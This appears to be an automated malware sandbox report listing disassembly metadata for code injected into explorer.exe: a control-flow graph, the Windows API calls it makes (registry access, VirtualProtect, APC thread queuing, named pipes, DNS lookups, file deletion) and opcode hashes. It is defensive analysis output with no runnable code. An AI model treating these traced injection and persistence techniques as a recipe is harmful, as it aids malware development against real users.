                                                                                                                                                      control_flow_graph 907 4da616c-4da6190 909 4da61a2-4da61b6 907->909 910 4da6192-4da6195 907->910 914 4da61bc-4da61c0 909->914 915 4da62f1-4da62f3 909->915 910->909 911 4da6197-4da619c 910->911 911->909 912 4da6300-4da630f 911->912 916 4da61c6-4da6239 call 4dadc4c call 4dac978 call 4dc0034 call 4dbfc74 * 2 RegOpenKeyExW 914->916 917 4da62d5-4da62ec call 4dcdb94 914->917 918 4da62fa 915->918 919 4da62f5-4da62f8 915->919 932 4da623b-4da6249 call 4db6220 916->932 933 4da6253-4da627a RegOpenKeyExW 916->933 917->915 918->912 919->912 919->918 932->933 934 4da627c-4da628a call 4db6220 933->934 935 4da6294-4da62bb RegOpenKeyExW 933->935 934->935 935->917 938 4da62bd-4da62cb call 4db6220 935->938 938->917
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Open
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                      • Opcode ID: 42feb7ac68de671a04e3b49c6c16a059626e58c6f2e2e8ebad42a4df37ca4293
                                                                                                                                                      • Instruction ID: 58a249eedd456ec5fe7ebd9115cf842786be8443d8997284705b477c86acd4cf
                                                                                                                                                      • Opcode Fuzzy Hash: 42feb7ac68de671a04e3b49c6c16a059626e58c6f2e2e8ebad42a4df37ca4293
                                                                                                                                                      • Instruction Fuzzy Hash: A3416631318B48CFDB59EF64D854A6AB7E6FBC8305F44492DE48AC3260DF74E9418B82
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Value
                                                                                                                                                      • String ID: (
                                                                                                                                                      • API String ID: 3702945584-3887548279
                                                                                                                                                      • Opcode ID: 195edf72f10804976c373486aec15e12711837f57cdfe35952af4a769e913bde
                                                                                                                                                      • Instruction ID: f08fee9d03f7420129b4456363d0f27cd7ab15b8fa54c4d7d240b47b2f26778a
                                                                                                                                                      • Opcode Fuzzy Hash: 195edf72f10804976c373486aec15e12711837f57cdfe35952af4a769e913bde
                                                                                                                                                      • Instruction Fuzzy Hash: 950140342197099FEB58DF68E8847AA77E0FB88304F40852DE84AC3351EB78E9418B41
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ConnectNamedPipe
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2191148154-0
                                                                                                                                                      • Opcode ID: dd3c1dc1044215fc69d28a41122a1d296d5b50b482f3f9d8b2ae4cffdaebd157
                                                                                                                                                      • Instruction ID: 634b6424ee7dc69addc61b22d2cfeff0f97e2d97ac7ce0ec4dcb85b5642688d4
                                                                                                                                                      • Opcode Fuzzy Hash: dd3c1dc1044215fc69d28a41122a1d296d5b50b482f3f9d8b2ae4cffdaebd157
                                                                                                                                                      • Instruction Fuzzy Hash: FD61A730718B058FD758EF38D4985BA77E2FB98311B548A2DE89BC32A5DF34D8419B81
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 04DC1458: VirtualProtect.KERNEL32 ref: 04DC148B
                                                                                                                                                      • VirtualProtect.KERNEL32 ref: 04DCFFD6
                                                                                                                                                      • VirtualProtect.KERNEL32 ref: 04DCFFF9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                      • Opcode ID: 8ab32006bd1df6a701864ba7e3d69da663e7aed914991a2a5fb048f6e1491c04
                                                                                                                                                      • Instruction ID: 74ede531ea9088a8ac3f252538c17d1275daf0f84d562f8227228484b23a934e
                                                                                                                                                      • Opcode Fuzzy Hash: 8ab32006bd1df6a701864ba7e3d69da663e7aed914991a2a5fb048f6e1491c04
                                                                                                                                                      • Instruction Fuzzy Hash: 85515B70718B098FEB45EF29D889A69B7E1FB9C305F10056EE44EC3261DB34E945CB86
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • ReadFile.KERNEL32 ref: 04DAFE16
                                                                                                                                                      • FindCloseChangeNotification.KERNEL32 ref: 04DAFE90
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ChangeCloseFileFindNotificationRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1200561807-0
                                                                                                                                                      • Opcode ID: 6848f4e2d5881aa74b5b1afec08c04206880bdc970ee2b74f368d5a17de0aa0c
                                                                                                                                                      • Instruction ID: 5a00c056b338bdb66c24c0b7ae8d71689d97810843d6449975d01ac5789651f3
                                                                                                                                                      • Opcode Fuzzy Hash: 6848f4e2d5881aa74b5b1afec08c04206880bdc970ee2b74f368d5a17de0aa0c
                                                                                                                                                      • Instruction Fuzzy Hash: 5431B83061C7488FD768EF68E4CD669B7E0FB58301F10456EE88AC3252EF34DA558B86
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$CreateRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3388366904-0
                                                                                                                                                      • Opcode ID: 6fc20d21720ccc80084a6e2228c9b2dc364fcc3dc8626018cb98fa32108dfc51
                                                                                                                                                      • Instruction ID: 01e4248b1e2c6b808ad71c9bb767054d1abe90b17be749f290ee6d28da9b3fee
                                                                                                                                                      • Opcode Fuzzy Hash: 6fc20d21720ccc80084a6e2228c9b2dc364fcc3dc8626018cb98fa32108dfc51
                                                                                                                                                      • Instruction Fuzzy Hash: C231CC30318B098FE754EF69989D7A976E1F798351F20812AD85BC3260DF34D4468792
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 04DCA864: RegCreateKeyA.ADVAPI32 ref: 04DCA887
                                                                                                                                                      • RegQueryValueExA.KERNEL32 ref: 04DB07C3
                                                                                                                                                      • RegCloseKey.KERNEL32 ref: 04DB0833
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseCreateQueryValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4083198587-0
                                                                                                                                                      • Opcode ID: 63f8bf2ffbde9439b19e476579ef08d7f0cd75ef32b6588a115372ae452a6d9a
                                                                                                                                                      • Instruction ID: 3f5244d7c4b83050dcf32d7fa4d1f3f1c80533df42f815bf7a2f3534fa8df739
                                                                                                                                                      • Opcode Fuzzy Hash: 63f8bf2ffbde9439b19e476579ef08d7f0cd75ef32b6588a115372ae452a6d9a
                                                                                                                                                      • Instruction Fuzzy Hash: 35211074718B088FE754EF69E88966677E1FB9C351F10452AE48AC3261EB34D941CBC2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 04DCA864: RegCreateKeyA.ADVAPI32 ref: 04DCA887
                                                                                                                                                      • RegSetValueExA.KERNEL32 ref: 04DC1EB5
                                                                                                                                                      • RegCloseKey.KERNEL32 ref: 04DC1ECA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseCreateValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1818849710-0
                                                                                                                                                      • Opcode ID: 010525a06cc86e1282a1dcc70fc59988e251bf6a3581915b7ed371b63630e897
                                                                                                                                                      • Instruction ID: 3e938d95edd7347091b8cfbfa4e440cd5b8b1ba8336569b48c7f90360cc52b71
                                                                                                                                                      • Opcode Fuzzy Hash: 010525a06cc86e1282a1dcc70fc59988e251bf6a3581915b7ed371b63630e897
                                                                                                                                                      • Instruction Fuzzy Hash: 3B113C70608B088F9784EF589499A29B7E1FB9C310F11455EE89EC3321DB74EC428B83
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateOpen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 436179556-0
                                                                                                                                                      • Opcode ID: 0fd58de01818f39c689c8671fe547acd9089d8ae02dcc106006c6a54173f430a
                                                                                                                                                      • Instruction ID: c472ad881caa68e253c81c202850fbb6570d37d2494a2e13b003ebab4d42b7a4
                                                                                                                                                      • Opcode Fuzzy Hash: 0fd58de01818f39c689c8671fe547acd9089d8ae02dcc106006c6a54173f430a
                                                                                                                                                      • Instruction Fuzzy Hash: AC018434618A498FDB58EF5C9488769BBE1FBD8341F10442EE88DC3365DAB5D9418782
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateQueueThreadUser
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3600083758-0
                                                                                                                                                      • Opcode ID: c5f73e2456696368beb962f5df60b520ee6541a707c920c0f1f52e72b2ec33b6
                                                                                                                                                      • Instruction ID: c0fcec509099c419394e0e91c06255d68d672a65a142fcbd82188a980e16752e
                                                                                                                                                      • Opcode Fuzzy Hash: c5f73e2456696368beb962f5df60b520ee6541a707c920c0f1f52e72b2ec33b6
                                                                                                                                                      • Instruction Fuzzy Hash: 2E017531714A194FAB44EF2CA84D77977E2FBAC711704856EE509C3275DB38DC428B81
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 04DBAF6C: GetTempFileNameA.KERNEL32(?,?,?,?,?,?,?,04DA1992), ref: 04DBAFE3
                                                                                                                                                      • DeleteFileA.KERNEL32 ref: 04DBD215
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$DeleteNameTemp
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1648863064-0
                                                                                                                                                      • Opcode ID: 03c2a81f9a1c11a55abee96452262d0c0f893495191509de088cf81c326b8804
                                                                                                                                                      • Instruction ID: 727e23e74fa5aec55d45e0f276ef18ce3fd3164ffe62b918625cd8d2b397312d
                                                                                                                                                      • Opcode Fuzzy Hash: 03c2a81f9a1c11a55abee96452262d0c0f893495191509de088cf81c326b8804
                                                                                                                                                      • Instruction Fuzzy Hash: 9B619030714A86CBEB39EB69DC987FA73D2FB94305F5489399887C7251DE38E4058781
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                      • Opcode ID: 6aa1d7655563690a4da4f05cca64eafe950653d6a721fc7ea7dd1fa497ac3de5
                                                                                                                                                      • Instruction ID: dcdc01d907bd50d34fe649b6b9a9c0f871be1d10c735b8a0c8f4e14dfca2cc5a
                                                                                                                                                      • Opcode Fuzzy Hash: 6aa1d7655563690a4da4f05cca64eafe950653d6a721fc7ea7dd1fa497ac3de5
                                                                                                                                                      • Instruction Fuzzy Hash: 09613170618E05DFD754EF18D885A66B7E1FBAC301B50451EE88BC3661EB34F8418BD6
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: fe02ce455d67f09005d2a37bd3cb44e7baf2b907739215d65d192ed9e4198867
                                                                                                                                                      • Instruction ID: af115c9af3b16d4f49eadae2f2942f5f294ed31c31017c6797a2a7b35c07d1f1
                                                                                                                                                      • Opcode Fuzzy Hash: fe02ce455d67f09005d2a37bd3cb44e7baf2b907739215d65d192ed9e4198867
                                                                                                                                                      • Instruction Fuzzy Hash: 8351E870708B098FDB55DF2CE89966577E1FB98314F40462EE49AC3260EF34E856CB86
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Value
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                      • Opcode ID: 216024542556dd411309f50c38fb88be061509f9e4b6fc9683d9ccb6d9a37dc5
                                                                                                                                                      • Instruction ID: 6a5be8e1410c20c4145a59da6c28e246b0648c296a8593ba4b5dc84a6e5935eb
                                                                                                                                                      • Opcode Fuzzy Hash: 216024542556dd411309f50c38fb88be061509f9e4b6fc9683d9ccb6d9a37dc5
                                                                                                                                                      • Instruction Fuzzy Hash: 53519230208B098FE754DF2CE89962677E1FB98305F00462EA44AC3360EF34E941CB82
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 04DBAF6C: GetTempFileNameA.KERNEL32(?,?,?,?,?,?,?,04DA1992), ref: 04DBAFE3
                                                                                                                                                      • DeleteFileA.KERNEL32 ref: 04DA6A0A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$DeleteNameTemp
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1648863064-0
                                                                                                                                                      • Opcode ID: 97c45c61a68756274780ff7a1a17f6003908ad3c066fe8c6cc2df5c60146dca1
                                                                                                                                                      • Instruction ID: 3a3e56b4300fd71e245e057351ca2c08aa878d35e5c4d9263f76e55c965f7c85
                                                                                                                                                      • Opcode Fuzzy Hash: 97c45c61a68756274780ff7a1a17f6003908ad3c066fe8c6cc2df5c60146dca1
                                                                                                                                                      • Instruction Fuzzy Hash: 1441C63031CA188FEB69EF69D889A7D33D1F799710B14442DD48BC32A6ED68EC5287D1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                      • Opcode ID: 4e3e6a161d5b02e9d01103ed044012703cd526c8f6528559d8211e7e6a4259e8
                                                                                                                                                      • Instruction ID: ec6d8cb4612614083c2bdb37315608ac72cb229abf6d95e598c7abb7589856c3
                                                                                                                                                      • Opcode Fuzzy Hash: 4e3e6a161d5b02e9d01103ed044012703cd526c8f6528559d8211e7e6a4259e8
                                                                                                                                                      • Instruction Fuzzy Hash: 73419C343086458FE758DF68C8D8A7A73F6FB89306F00442DE58AC7251EB79E951CB41
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CallNamedPipe
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1741058652-0
                                                                                                                                                      • Opcode ID: 3a8f9de0c657a49d155db600dd5a5f386ffbca9f062bf4a1c4fbe15f73d8f60f
                                                                                                                                                      • Instruction ID: 252ad514d0c634a22142623d16340dae5fd527b9ddf367275565e5a16b334b78
                                                                                                                                                      • Opcode Fuzzy Hash: 3a8f9de0c657a49d155db600dd5a5f386ffbca9f062bf4a1c4fbe15f73d8f60f
                                                                                                                                                      • Instruction Fuzzy Hash: 8941B37161CB098FE758DF58E8899B677E5FB98700F00456EE94AC3261EE74F801CB85
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: gethostbyname
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 930432418-0
                                                                                                                                                      • Opcode ID: 5f05322b8684c5dce78c252173af7e4799d163bf0f3aee7cf75f238d3e8e6222
                                                                                                                                                      • Instruction ID: 9a0be33a1696211d2706063a5c12bbf9bcf2e7c77df2ee55ea9bdc2f13c9b44f
                                                                                                                                                      • Opcode Fuzzy Hash: 5f05322b8684c5dce78c252173af7e4799d163bf0f3aee7cf75f238d3e8e6222
                                                                                                                                                      • Instruction Fuzzy Hash: 1E316131708A1CCF9B58EF69E88956977E1FB9C301B54886DE84BC3221EA74D946C781
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Open
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                      • Opcode ID: ff708e24ccf0847f36c1806cad05615ff8cebb489172a381ea6a649745fbfcf6
                                                                                                                                                      • Instruction ID: 6c1c5dd57a81e8cce6ab359a97bb4d30785bb3d3131f881a530cabbb8b0647fa
                                                                                                                                                      • Opcode Fuzzy Hash: ff708e24ccf0847f36c1806cad05615ff8cebb489172a381ea6a649745fbfcf6
                                                                                                                                                      • Instruction Fuzzy Hash: 72311074718B088FDB94EF28D858B6AB7E1FB98341F50456DE48EC3264DB78D941CB42
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                      • Opcode ID: 00c99e4237884e64ecf479b4bce83207a97088a339d818223d5ae1b9bbcb711a
                                                                                                                                                      • Instruction ID: dd7a1738d6baef904e30acb8802d21899807c4c918410f4ac219a5079ee71166
                                                                                                                                                      • Opcode Fuzzy Hash: 00c99e4237884e64ecf479b4bce83207a97088a339d818223d5ae1b9bbcb711a
                                                                                                                                                      • Instruction Fuzzy Hash: 2C21623160CB098FA714EB5DDC996A577D1F798351F04843AE88AC3261EA74E84187C1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • FindCloseChangeNotification.KERNEL32 ref: 04DCA9C8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ChangeCloseFindNotification
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2591292051-0
                                                                                                                                                      • Opcode ID: 14b02dd6c9e907ec2f2737c0b09998d7d0f9f84179de5284574e2a4d11ca5392
                                                                                                                                                      • Instruction ID: ba605482173931065beefe3d314f413df4b39eeff91cfce37b08fafd878a3dfb
                                                                                                                                                      • Opcode Fuzzy Hash: 14b02dd6c9e907ec2f2737c0b09998d7d0f9f84179de5284574e2a4d11ca5392
                                                                                                                                                      • Instruction Fuzzy Hash: 4321D830718A098FDB08EF78D8992AA77D5FB99305F41842DE88BC3355EE34E8058791
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • GetTempFileNameA.KERNEL32(?,?,?,?,?,?,?,04DA1992), ref: 04DBAFE3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileNameTemp
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 745986568-0
                                                                                                                                                      • Opcode ID: f2832eb2cade261e6e517229f0148254a84f956b48d9d74b9b7ce22701d13fdb
                                                                                                                                                      • Instruction ID: b87b1402c2f0ff5a30effc498f820b1d8b1a7be77290c7074aed28f8af443bf4
                                                                                                                                                      • Opcode Fuzzy Hash: f2832eb2cade261e6e517229f0148254a84f956b48d9d74b9b7ce22701d13fdb
                                                                                                                                                      • Instruction Fuzzy Hash: A8216531308A058FAB59DF69AC9867A37D2FBD83017148129E447C3154DE38E9468781
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                      • Opcode ID: 4a765497a387f33308d21eb6f57c50523c4476f30fd5c9db11123bb1565e96cc
                                                                                                                                                      • Instruction ID: 28e1e3a6052403b955c062fadafa34a1e98db3346a4281a5354f56272f69bf85
                                                                                                                                                      • Opcode Fuzzy Hash: 4a765497a387f33308d21eb6f57c50523c4476f30fd5c9db11123bb1565e96cc
                                                                                                                                                      • Instruction Fuzzy Hash: 2611813120CB088F9B18EF59E8850A9B3E5FB9C316700452DE94EC3256EA30E905CBC2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 04DCA864: RegCreateKeyA.ADVAPI32 ref: 04DCA887
                                                                                                                                                      • RegQueryValueExA.KERNEL32 ref: 04DB63E2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateQueryValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2711935003-0
                                                                                                                                                      • Opcode ID: a38569a501b8e0ec64ed77100791f3d441e58a8fbacd49a898224bfc5fb91074
                                                                                                                                                      • Instruction ID: 0cd54d59f9ed40d77812a5bc1b5e80d1d311e1e7252f954ebed774b4263904d2
                                                                                                                                                      • Opcode Fuzzy Hash: a38569a501b8e0ec64ed77100791f3d441e58a8fbacd49a898224bfc5fb91074
                                                                                                                                                      • Instruction Fuzzy Hash: 8521213061CB488FE755EF64D888AAAB7E1FB98309F50096EE48BC3250EB74D545CB42
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                      • Opcode ID: 32ea44639e2575752aae5852ebfdb13d51a2d7fe9b7ca05d47b439ede88620c7
                                                                                                                                                      • Instruction ID: 67acc63dbfc2287b66e6e92f3d6a57e30468b2bcb39cd8db35926f45aa0d0825
                                                                                                                                                      • Opcode Fuzzy Hash: 32ea44639e2575752aae5852ebfdb13d51a2d7fe9b7ca05d47b439ede88620c7
